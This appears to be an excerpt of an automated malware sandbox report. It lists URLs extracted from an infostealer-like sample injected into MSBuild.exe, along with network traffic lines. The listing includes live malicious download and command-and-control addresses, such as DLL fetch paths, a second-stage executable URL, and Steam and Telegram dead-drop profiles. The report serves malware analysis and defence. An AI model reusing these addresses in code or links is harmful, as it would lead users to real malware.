Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/freebl3.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/freebl3.dllg
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/mozglue.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/mozglue.dllC
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/msvcp140.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/msvcp140.dll2
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/nss3.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/nss3.dllZ_
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/softokn3.dllO
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/softokn3.dllb
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/sql.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/vcruntime140.dll
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000494000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80/sql.dll
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5
Source: MSBuild.exe, 00000003.00000002.2174458155.0000000000494000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80t-Disposition:
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe-
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe=
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000003.00000002.2188526414.000000001D69D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ECGIII.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: ECGIII.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ECGIII.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ECGIII.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ECGIII.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ECGIII.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ECGIII.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 0000000B.00000002.2205846539.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frizzettei.sbs/api
Source: MSBuild.exe, 0000000B.00000002.2205846539.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frizzettei.sbs/apiwDVP
Source: JKECFC.3.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: https://mozilla.org0/
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: HJEHIJ.3.dr String found in binary or memory: https://support.mozilla.org
Source: HJEHIJ.3.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HJEHIJ.3.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, GIIEGH.3.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: GIIEGH.3.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, GIIEGH.3.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: GIIEGH.3.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5ed
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wickedneatr.sbs/api
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wickedneatr.sbs/cDWE
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001173000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wickedneatr.sbs/pi
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001186000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wickedneatr.sbs:443/api
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ECGIII.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: ECGIII.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HJEHIJ.3.dr String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HJEHIJ.3.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: HJEHIJ.3.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HJEHIJ.3.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HJEHIJ.3.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: HJEHIJ.3.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53757
Source: unknown Network traffic detected: HTTP traffic on port 53840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53878
Source: unknown Network traffic detected: HTTP traffic on port 53710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53873
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53755
Source: unknown Network traffic detected: HTTP traffic on port 53777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53876
Source: unknown Network traffic detected: HTTP traffic on port 53664 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53874
Source: unknown Network traffic detected: HTTP traffic on port 53791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53880
Source: unknown Network traffic detected: HTTP traffic on port 53721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53801
Source: unknown Network traffic detected: HTTP traffic on port 53816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53808
Source: unknown Network traffic detected: HTTP traffic on port 53860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53806
Source: unknown Network traffic detected: HTTP traffic on port 53883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53805
Source: unknown Network traffic detected: HTTP traffic on port 53839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown Network traffic detected: HTTP traffic on port 53768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53809
Source: unknown Network traffic detected: HTTP traffic on port 53651 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53813
Source: unknown Network traffic detected: HTTP traffic on port 53697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53817
Source: unknown Network traffic detected: HTTP traffic on port 53733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53811
Source: unknown Network traffic detected: HTTP traffic on port 53662 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53810
Source: unknown Network traffic detected: HTTP traffic on port 53895 -> 443
